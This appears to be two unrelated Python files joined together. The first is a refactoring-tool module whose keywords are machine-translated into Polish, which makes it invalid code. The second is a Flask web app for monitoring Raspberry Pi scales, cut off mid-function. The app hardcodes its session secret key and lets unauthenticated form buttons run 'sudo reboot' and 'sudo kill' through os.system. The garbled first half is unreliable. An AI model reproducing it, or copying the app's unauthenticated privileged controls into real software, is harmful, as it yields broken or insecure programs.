z .pgen2 zaimportuj driver, tokenize, token
z .fixer_util zaimportuj find_root
z . zaimportuj pytree, pygram
z . zaimportuj btm_utils jako bu
z . zaimportuj btm_matcher jako bm
def get_all_fix_names(fixer_pkg, remove_prefix=Prawda):
"""Return a sorted list of all available fix names w the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
dla name w sorted(os.listdir(fixer_dir)):
jeżeli name.startswith("fix_") oraz name.endswith(".py"):
jeżeli remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
zwróć fix_names
klasa _EveryNode(Exception):
dalej
def _get_head_types(pat):
""" Accepts a pytree Pattern Node oraz returns a set
of the pattern types which will match first. """
jeżeli isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type oraz no content
# albo a type oraz content -- so they don't get any farther
# Always zwróć leafs
jeżeli pat.type jest Nic:
podnieś _EveryNode
zwróć {pat.type}
jeżeli isinstance(pat, pytree.NegatedPattern):
jeżeli pat.content:
zwróć _get_head_types(pat.content)
podnieś _EveryNode # Negated Patterns don't have a type
jeżeli isinstance(pat, pytree.WildcardPattern):
# Recurse on each node w content
r = set()
dla p w pat.content:
dla x w p:
r.update(_get_head_types(x))
zwróć r
podnieś Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers oraz returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
dla fixer w fixer_list:
jeżeli fixer.pattern:
spróbuj:
heads = _get_head_types(fixer.pattern)
wyjąwszy _EveryNode:
every.append(fixer)
inaczej:
dla node_type w heads:
head_nodes[node_type].append(fixer)
inaczej:
jeżeli fixer._accept_type jest nie Nic:
head_nodes[fixer._accept_type].append(fixer)
inaczej:
every.append(fixer)
dla node_type w chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
zwróć dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names dla fixers w the package pkg_name.
"""
zwróć [pkg_name + "." + fix_name
dla fix_name w get_all_fix_names(pkg_name, Nieprawda)]
def _identity(obj):
zwróć obj
jeżeli sys.version_info < (3, 0):
zaimportuj codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
zwróć input.replace("\r\n", "\n")
def _to_system_newlines(input):
jeżeli os.linesep != "\n":
zwróć input.replace("\n", os.linesep)
inaczej:
zwróć input
inaczej:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = Nieprawda
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
zwróć tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
spróbuj:
dopóki Prawda:
tp, value = advance()
jeżeli tp w ignore:
kontynuuj
albo_inaczej tp == token.STRING:
jeżeli have_docstring:
przerwij
have_docstring = Prawda
albo_inaczej tp == token.NAME oraz value == "from":
tp, value = advance()
jeżeli tp != token.NAME albo value != "__future__":
przerwij
tp, value = advance()
jeżeli tp != token.NAME albo value != "import":
przerwij
tp, value = advance()
jeżeli tp == token.OP oraz value == "(":
tp, value = advance()
dopóki tp == token.NAME:
features.add(value)
tp, value = advance()
jeżeli tp != token.OP albo value != ",":
przerwij
tp, value = advance()
inaczej:
przerwij
wyjąwszy StopIteration:
dalej
zwróć frozenset(features)
klasa FixerError(Exception):
"""A fixer could nie be loaded."""
klasa RefactoringTool(object):
_default_options = {"print_function" : Nieprawda,
"write_unchanged_files" : Nieprawda}
CLASS_PREFIX = "Fix" # The prefix dla fixer classes
FILE_PREFIX = "fix_" # The prefix dla modules przy a fixer within
def __init__(self, fixer_names, options=Nic, explicit=Nic):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: an dict przy configuration.
explicit: a list of fixers to run even jeżeli they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit albo []
self.options = self._default_options.copy()
jeżeli options jest nie Nic:
self.options.update(options)
jeżeli self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
inaczej:
self.grammar = pygram.python_grammar
# When this jest Prawda, the refactor*() methods will call write_file() for
# files processed even jeżeli they were nie changed during refactoring. If
# oraz only jeżeli the refactor method's write parameter was Prawda.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = Nieprawda
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were albo should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
dla fixer w chain(self.post_order, self.pre_order):
jeżeli fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
albo_inaczej fixer w self.pre_order:
self.bmi_pre_order.append(fixer)
albo_inaczej fixer w self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns oraz handlers.
Returns:
(pre_order, post_order), where pre_order jest the list of fixers that
want a pre-order AST traversal, oraz post_order jest the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
dla fix_mod_path w self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
jeżeli fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() dla p w parts])
spróbuj:
fix_class = getattr(mod, class_name)
wyjąwszy AttributeError:
podnieś FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
jeżeli fixer.explicit oraz self.explicit jest nie Prawda oraz \
fix_mod_path nie w self.explicit:
self.log_message("Skipping optional fixer: %s", fix_name)
kontynuuj
self.log_debug("Adding transformation: %s", fix_name)
jeżeli fixer.order == "pre":
pre_order_fixers.append(fixer)
albo_inaczej fixer.order == "post":
post_order_fixers.append(fixer)
inaczej:
podnieś FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
zwróć (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
podnieś
def log_message(self, msg, *args):
"""Hook to log a message."""
jeżeli args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
jeżeli args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called przy the old version, new version, oraz filename of a
refactored file."""
dalej
def refactor(self, items, write=Nieprawda, doctests_only=Nieprawda):
"""Refactor a list of files oraz directories."""
dla dir_or_file w items:
jeżeli os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
inaczej:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=Nieprawda, doctests_only=Nieprawda):
"""Descends down a directory oraz refactor every Python file found.
Python files are assumed to have a .py extension.
Files oraz subdirectories starting przy '.' are skipped.
"""
py_ext = os.extsep + "py"
dla dirpath, dirnames, filenames w os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
dla name w filenames:
jeżeli (nie name.startswith(".") oraz
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs przy leading dots
dirnames[:] = [dn dla dn w dirnames jeżeli nie dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
spróbuj:
f = open(filename, "rb")
wyjąwszy OSError jako err:
self.log_error("Can't open %s: %s", filename, err)
zwróć Nic, Nic
spróbuj:
encoding = tokenize.detect_encoding(f.readline)[0]
w_końcu:
f.close()
przy _open_with_encoding(filename, "r", encoding=encoding) jako f:
zwróć _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=Nieprawda, doctests_only=Nieprawda):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
jeżeli input jest Nic:
# Reading the file failed.
zwróć
input += "\n" # Silence certain parse errors
jeżeli doctests_only:
self.log_debug("Refactoring doctests w %s", filename)
output = self.refactor_docstring(input, filename)
jeżeli self.write_unchanged_files albo output != input:
self.processed_file(output, filename, input, write, encoding)
inaczej:
self.log_debug("No doctest changes w %s", filename)
inaczej:
tree = self.refactor_string(input, filename)
jeżeli self.write_unchanged_files albo (tree oraz tree.was_changed):
# The [:-1] jest to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
inaczej:
self.log_debug("No changes w %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name dla use w error/log messages.
Returns:
An AST corresponding to the refactored input stream; Nic if
there were errors during the parse.
"""
features = _detect_future_features(data)
jeżeli "print_function" w features:
self.driver.grammar = pygram.python_grammar_no_print_statement
spróbuj:
tree = self.driver.parse_string(data)
wyjąwszy Exception jako err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
zwróć
w_końcu:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
zwróć tree
def refactor_stdin(self, doctests_only=Nieprawda):
input = sys.stdin.read()
jeżeli doctests_only:
self.log_debug("Refactoring doctests w stdin")
output = self.refactor_docstring(input, "<stdin>")
jeżeli self.write_unchanged_files albo output != input:
self.processed_file(output, "<stdin>", input)
inaczej:
self.log_debug("No doctest changes w stdin")
inaczej:
tree = self.refactor_string(input, "<stdin>")
jeżeli self.write_unchanged_files albo (tree oraz tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
inaczej:
self.log_debug("No changes w stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree w place).
For compatible patterns the bottom matcher module jest
used. Otherwise the tree jest traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name dla this tree.
Returns:
Prawda jeżeli the tree was modified, Nieprawda otherwise.
"""
dla fixer w chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching dla the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
dopóki any(match_set.values()):
dla fixer w self.BM.fixers:
jeżeli fixer w match_set oraz match_set[fixer]:
#sort by depth; apply fixers z bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=Prawda)
jeżeli fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#przy the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
dla node w list(match_set[fixer]):
jeżeli node w match_set[fixer]:
match_set[fixer].remove(node)
spróbuj:
find_root(node)
wyjąwszy ValueError:
# this node has been cut off z a
# previous transformation ; skip
kontynuuj
jeżeli node.fixers_applied oraz fixer w node.fixers_applied:
# do nie apply the same fixer again
kontynuuj
results = fixer.match(node)
jeżeli results:
new = fixer.transform(node, results)
jeżeli new jest nie Nic:
node.replace(new)
#new.fixers_applied.append(fixer)
dla node w new.post_order():
# do nie apply the fixer again to
# this albo any subnode
jeżeli nie node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
dla fxr w new_matches:
jeżeli nie fxr w match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
dla fixer w chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
zwróć tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This jest a helper method dla refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that uzyskajs AST nodes.
Returns:
Nic
"""
jeżeli nie fixers:
zwróć
dla node w traversal:
dla fixer w fixers[node.type]:
results = fixer.match(node)
jeżeli results:
new = fixer.transform(node, results)
jeżeli new jest nie Nic:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=Nic, write=Nieprawda,
encoding=Nic):
"""
Called when a file has been refactored oraz there may be changes.
"""
self.files.append(filename)
jeżeli old_text jest Nic:
old_text = self._read_python_source(filename)[0]
jeżeli old_text jest Nic:
zwróć
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
jeżeli equal:
self.log_debug("No changes to %s", filename)
jeżeli nie self.write_unchanged_files:
zwróć
jeżeli write:
self.write_file(new_text, filename, old_text, encoding)
inaczej:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=Nic):
"""Writes a string to a file.
It first shows a unified diff between the old text oraz the new text, oraz
then rewrites the file; the latter jest only done jeżeli the write option jest
set.
"""
spróbuj:
f = _open_with_encoding(filename, "w", encoding=encoding)
wyjąwszy OSError jako err:
self.log_error("Can't create %s: %s", filename, err)
zwróć
spróbuj:
f.write(_to_system_newlines(new_text))
wyjąwszy OSError jako err:
self.log_error("Can't write %s: %s", filename, err)
w_końcu:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = Prawda
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking dla doctests.
This returns a modified version of the input string. It looks
dla doctests, which start przy a ">>>" prompt, oraz may be
continued przy "..." prompts, jako long jako the "..." jest indented
the same jako the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it jest nie geared towards preserving
the original source.)
"""
result = []
block = Nic
block_lineno = Nic
indent = Nic
lineno = 0
dla line w input.splitlines(keepends=Prawda):
lineno += 1
jeżeli line.lstrip().startswith(self.PS1):
jeżeli block jest nie Nic:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
albo_inaczej (indent jest nie Nic oraz
(line.startswith(indent + self.PS2) albo
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
inaczej:
jeżeli block jest nie Nic:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = Nic
indent = Nic
result.append(line)
jeżeli block jest nie Nic:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
zwróć "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest jest given jako a block of lines, the first of which starts
przy ">>>" (possibly indented), dopóki the remaining lines start
przy "..." (identically indented).
"""
spróbuj:
tree = self.parse_block(block, lineno, indent)
wyjąwszy Exception jako err:
jeżeli self.logger.isEnabledFor(logging.DEBUG):
dla line w block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring w %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
zwróć block
jeżeli self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=Prawda)
# Undo the adjustment of the line numbers w wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
jeżeli nie new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
jeżeli new:
block += [indent + self.PS2 + line dla line w new]
zwróć block
def summarize(self):
jeżeli self.wrote:
were = "were"
inaczej:
were = "need to be"
jeżeli nie self.files:
self.log_message("No files %s modified.", were)
inaczej:
self.log_message("Files that %s modified:", were)
dla file w self.files:
self.log_message(file)
jeżeli self.fixer_log:
self.log_message("Warnings/messages dopóki refactoring:")
dla message w self.fixer_log:
self.log_message(message)
jeżeli self.errors:
jeżeli len(self.errors) == 1:
self.log_message("There was 1 error:")
inaczej:
self.log_message("There were %d errors:", len(self.errors))
dla msg, args, kwds w self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This jest necessary to get correct line number / offset information
w the parser diagnostics oraz embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
zwróć tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
dla type, value, (line0, col0), (line1, col1), line_text w tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this jest too complicated
# since line_text would also have to be updated oraz it would
# still przerwij dla tokens spanning lines. Let the user guess
# that the column numbers dla doctests are relative to the
# end of the prompt string (PS1 albo PS2).
uzyskaj type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines jako expected by tokenize z a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
dla line w block:
jeżeli line.startswith(prefix):
uzyskaj line[len(prefix):]
albo_inaczej line == prefix.rstrip() + "\n":
uzyskaj "\n"
inaczej:
podnieś AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
dopóki Prawda:
uzyskaj ""
klasa MultiprocessingUnsupported(Exception):
dalej
klasa MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = Nic
self.output_lock = Nic
def refactor(self, items, write=Nieprawda, doctests_only=Nieprawda,
num_processes=1):
jeżeli num_processes == 1:
zwróć super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
spróbuj:
zaimportuj multiprocessing
wyjąwszy ImportError:
podnieś MultiprocessingUnsupported
jeżeli self.queue jest nie Nic:
podnieś RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
dla i w range(num_processes)]
spróbuj:
dla p w processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
w_końcu:
self.queue.join()
dla i w range(num_processes):
self.queue.put(Nic)
dla p w processes:
jeżeli p.is_alive():
p.join()
self.queue = Nic
def _child(self):
task = self.queue.get()
dopóki task jest nie Nic:
args, kwargs = task
spróbuj:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
w_końcu:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
jeżeli self.queue jest nie Nic:
self.queue.put((args, kwargs))
inaczej:
zwróć super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
FlaskMain.py | #!/usr/bin/python
import math
import threading
import os
import subprocess
import time
import datetime
import sys
import logging
from flask import Flask, render_template, redirect, url_for, request, send_from_directory, session
import BokehGraphCreator as GraphCreater
sys.path.append('../Tools/')
import ScaleInfoReaderWriter as ScaleIRW
import DatabaseReaderWriter as DBRW
import ConfigReaderWriter as CfgRW
exportDir = "../Exports"
logDir = "../Log"
logFile = "Log.txt"
ScaleDataDB = None
reconnectLock = threading.Lock()
def LoadDB():
if CfgRW.cfgVars["dbToUse"] == "mongo":
db = DBRW.MongoDBProfile()
else:
db = DBRW.MongoDBProfile()
# db = DBRW.MySQLDBProfile()
db.Connect()
return db
def Reconnect():
if not reconnectLock.locked():
reconnectLock.acquire()
ScaleDataDB.Reconnect()
reconnectLock.release()
ScaleDataDB = LoadDB()
app = Flask(__name__)
app.secret_key = "Not Random. Oh Noes"
# It doesn't matter becuase im not storing passwords or anything
@app.route('/')
def start():
return redirect(url_for('home'))
@app.route('/Home', methods=['GET'])
def home():
didFail = "False"
failMsg = "None"
if 'failMsg' in session:
failMsg = session.pop('failMsg', None)
didFail = "True"
numOfScales = ScaleIRW.GetNumOfScales()
js_resources, css_resources = GraphCreater.GetStaticResources()
horizontalAlignments = list()
for i in range(int(math.ceil(numOfScales/2.0))):
scale1 = ScaleIRW.ScaleInfo(i*2+1)
scale1.startGPIO()
if i*2+1 < numOfScales:
scale2 = ScaleIRW.ScaleInfo(i*2+2)
scale2.startGPIO()
if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
value1 = ScaleDataDB.GetLatestSample(scale1)
value2 = ScaleDataDB.GetLatestSample(scale2)
else:
value1 = scale1.GetValue()
value2 = scale2.GetValue()
horizontalAlignments.append(GraphCreater.CombineFigs('h', GraphCreater.CreateGauge(value1, scale1),
GraphCreater.CreateGauge(value2, scale2)))
else:
if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
value1 = ScaleDataDB.GetLatestSample(scale1)
else:
value1 = scale1.GetValue()
horizontalAlignments.append(GraphCreater.CreateGauge(value1, scale1))
if value1 == -1:
t = threading.Thread(target=Reconnect)
t.start()
script, div = GraphCreater.GetComponentsFromFig(GraphCreater.CombineFigs('v', horizontalAlignments))
scaleAggregatorPID = GetPIDOfScaleAggregator()
scaleAggregatorIsRunning = False
try:
if scaleAggregatorPID != None:
scaleAggregatorIsRunning = os.path.exists("/proc/" + scaleAggregatorPID)
except:
scaleAggregatorIsRunning = False
return render_template("HomePage.html", num=numOfScales, plot_script=script, plot_div=div, js_resources=js_resources, css_resources=css_resources,
scaleAggregatorIsRunning=scaleAggregatorIsRunning, didFail=didFail, failMsg=failMsg)
@app.route('/Home', methods=['POST'])
def homePost():
if request.form["submit"] == "Restart Pi":
os.system('sudo reboot')
if request.form["submit"] == "Start ScaleAggregator":
os.system("(cd ../ScaleAggregator/; python ScaleAggregator.py &)")
return redirect(url_for('home'))
if request.form["submit"] == "Stop ScaleAggregator":
try:
PID = GetPIDOfScaleAggregator()
os.system("sudo kill " + PID)
except:
pass
return redirect(url_for('home'))
if request.form["submit"] == "Download Log File":
try:
return send_from_directory(logDir, logFile, as_attachment=True)
except Exception as error:
app.logger.error("An error occurred while trying to export the log. Exception: " + str(error))
session['failMsg'] = "An error occurred while trying to export the log."
return redirect(url_for('home'))
if request.form["submit"] == "Delete Log File":
closeLoggerHandlers()
try:
DeleteLogFile()
except Exception as error:
app.logger.error("An error occurred while trying to delete the log. Exception: " + str(error))
session['failMsg'] = "An error occurred while trying to delete the log file. Close all other programs that log to the log file and try again."
app.logger.addHandler(createHandler())
return redirect(url_for('home'))
if request.form["submit"] == "Download Scale Info File":
try:
return send_from_directory("../", "ScaleInfoFile.SIF", as_attachment=True)
except Exception as error:
app.logger.error("An error occurred while trying to download the Scale Info File. Exception: " + str(error))
session['failMsg'] = "An error occurred while trying to download the Scale Info File."
return redirect(url_for('home'))
def GetPIDOfScaleAggregator():
try:
output = subprocess.check_output("ps ax | grep ScaleAggregator.py", shell=True)
output = output.strip()
PID = output.split(' ')[0]
return PID
except:
return None
def CreateScaleGraphFromTimeFrame(num, hours=730):
ki = ScaleIRW.ScaleInfo(num)
didFail = "False"
failMsg = "None"
if 'failMsg' in session:
failMsg = session.pop('failMsg', None)
didFail = "True"
if not ki.Failed:
ki.startGPIO()
if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
value = ScaleDataDB.GetLatestSample(ki)
else:
value = ki.GetValue()
else:
if failMsg == "None":
failMsg = "An error occurred while loading scale info."
value = 0
didFail = "True"
totalScales = ScaleIRW.GetNumOfScales()
# Get the data
dbNotWorking = False
try:
if ScaleDataDB.Connected == True:
timeFrameData = ScaleDataDB.GetTimeFrameFor(ki, hours)
else:
raise Exception('GetTimeFrameFor failed')
except:
dbNotWorking = True
ScaleDataDB.Connected = False
timeFrameData = {'valueList': list(), 'timeStampList': list()}
t = threading.Thread(target=Reconnect)
t.start()
y = timeFrameData['valueList']
x = timeFrameData['timeStampList']
js_resources, css_resources = GraphCreater.GetStaticResources()
# render template
gfig = GraphCreater.CreateGauge(value, ki)
pfig = GraphCreater.CreatePlot(x, y, ki, dbNotWorking, withDots=False)
script, div = GraphCreater.GetComponentsFromFig(GraphCreater.CombineFigs('v', gfig, pfig))
html = render_template("ScaleInfo.html", num=num, type=ki.Type, name=ki.Name,
unit=ki.Units, didFail=didFail, failMsg=failMsg,
totalNum=totalScales, plot_script=script, plot_div=div,
js_resources=js_resources, css_resources=css_resources)
return GraphCreater.encodeToUTF8(html)
def ExportScaleGraphFromTimeFrame(num, hours=730):
ki = ScaleIRW.ScaleInfo(num)
if ki.Failed:
session['failMsg'] = "An error occurred while loading scale info."
if hours == 730:
return redirect(url_for('getScale', num))
else:
return redirect(url_for('getScaleWithTimeFrame', num, hours))
dbNotWorking = False
try:
if ScaleDataDB.Connected == True:
timeFrameData = ScaleDataDB.GetTimeFrameFor(ki, hours)
else:
raise Exception('GetTimeFrameFor failed')
except:
dbNotWorking = True
ScaleDataDB.Connected = False
session['failMsg'] = "An error occurred while exporting historical data."
if hours == 730:
return redirect(url_for('getScale', num))
else:
return redirect(url_for('getScaleWithTimeFrame', num, hours))
y = timeFrameData['valueList']
x = timeFrameData['timeStampList']
if not os.path.isdir(exportDir):
os.makedirs(exportDir)
timeStamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d-%H%M%S')
exportPath = exportDir + "/" + timeStamp + ".csv"
FW = open(exportPath, "w")
FW.write("Secs Ago,Value\n")
for i in range(len(x)):
FW.write(str(x[i]) + "," + str(y[i]))
FW.write("\n")
FW.close()
return send_from_directory(exportDir, timeStamp + ".csv", as_attachment=True)
@app.route('/ScaleInfo=<int:num>', methods=['GET', 'POST'])
def getScale(num):
if request.method == 'GET':
return CreateScaleGraphFromTimeFrame(num)
elif request.method == 'POST':
if request.form['_action'] == "Export":
return ExportScaleGraphFromTimeFrame(num)
elif request.form['_action'] == 'DELETE':
ki = ScaleIRW.ScaleInfo(num)
ki.Delete()
return redirect(url_for('home'))
elif request.form['_action'] == 'ShowLastDay':
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=24))
elif request.form['_action'] == 'ShowLastWeek':
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=(24*7)))
elif request.form['_action'] == 'ShowHoursAgo':
h = request.form['HoursAgo']
try:
int(h)
except:
session['failMsg'] = "An error occurred while processing your input."
return redirect(url_for('getScale', num=num))
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=h))
elif request.form['_action'] == 'ShowDefault':
return redirect(url_for('getScale', num=num))
@app.route('/ScaleInfo=<int:num>t=<int:hours>', methods=['GET', 'POST'])
def getScaleWithTimeFrame(num, hours):
if request.method == 'GET':
return CreateScaleGraphFromTimeFrame(num, hours)
elif request.method == 'POST':
if request.form['_action'] == "Export":
return ExportScaleGraphFromTimeFrame(num, hours)
elif request.form['_action'] == 'DELETE':
ki = ScaleIRW.ScaleInfo(num)
ki.Delete()
return redirect(url_for('home'))
elif request.form['_action'] == 'ShowLastDay':
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=24))
elif request.form['_action'] == 'ShowLastWeek':
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=(24*7)))
elif request.form['_action'] == 'ShowHoursAgo':
h = request.form['HoursAgo']
try:
int(h)
except:
session['failMsg'] = "An error occurred while processing your input."
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=hours))
return redirect(url_for('getScaleWithTimeFrame', num=num, hours=h))
elif request.form['_action'] == 'ShowDefault':
return redirect(url_for('getScale', num=num))
@app.route('/AddScale')
def addScale():
if 'failMsg' not in session:
didFail = "False"
failMsg = "None"
else:
didFail = "True"
failMsg = session.pop('failMsg', None)
num = ScaleIRW.GetNumOfScales()
return render_template("AddScale.html", num=num, didFail=didFail, failMsg=failMsg)
@app.route('/AddScale<int:num>/Range', methods=['GET', 'POST'])
def setScaleRange(num):
totalNum = ScaleIRW.GetNumOfScales()
s = ScaleIRW.ScaleInfo(num)
if request.method == 'GET':
return render_template("SetRange.html", totalNum=totalNum, num=num, lr=s.EmptyValue, ur=s.FullValue)
elif request.method == 'POST':
s.startGPIO()
if request.form['submit'] == 'Get Empty Value':
s.GetLowerRange()
s.SetRange(s.EmptyValue, request.form['FullValue'])
return redirect(url_for('setScaleRange', num=num))
elif request.form['submit'] == 'Get Full Value':
s.GetUpperRange()
s.SetRange(request.form['EmptyValue'], s.FullValue)
return redirect(url_for('setScaleRange', num=num))
elif request.form['submit'] == 'Set':
s.SetRange(request.form['EmptyValue'], request.form['FullValue'])
return redirect(url_for('getScale', num=num))
@app.route('/AddScale', methods=['POST'])
def addScalePost():
Type = request.form['Type']
Name = request.form['Name']
MaxCapacity = request.form['MaxCapacity']
Units = request.form['Units']
DataPin = request.form['DataPin']
ClockPin = request.form['ClockPin']
oldNumOfScales = ScaleIRW.GetNumOfScales()
num = ScaleIRW.AddScaleInfoToFile(Type, Name, MaxCapacity, Units, DataPin, ClockPin)
if oldNumOfScales == ScaleIRW.GetNumOfScales():
session['failMsg'] = "An error occurred while processing your input."
return redirect(url_for('addScale'))
return redirect(url_for('setScaleRange', num=num))
@app.route('/Settings', methods=['GET','POST'])
def changeSettings():
totalNum = ScaleIRW.GetNumOfScales()
if request.method == 'GET':
currentDBToUse = CfgRW.cfgVars["dbToUse"]
currentSimulateData = CfgRW.cfgVars["simulateData"]
currentUseCQuickPulse = CfgRW.cfgVars["useCQuickPulse"]
currentUseMedianOfData = CfgRW.cfgVars["useMedianOfData"]
currentUselatestFromMongoAsCurrent = CfgRW.cfgVars["uselatestFromMongoAsCurrent"]
currentLoadSamplesPerRead = CfgRW.cfgVars["loadSamplesPerRead"]
currentLaunchScaleAggregatorOnStart = CfgRW.cfgVars["launchScaleAggregatorOnStart"]
currentAggregatorSecsPerPersist = CfgRW.cfgVars["aggregatorSecsPerPersist"]
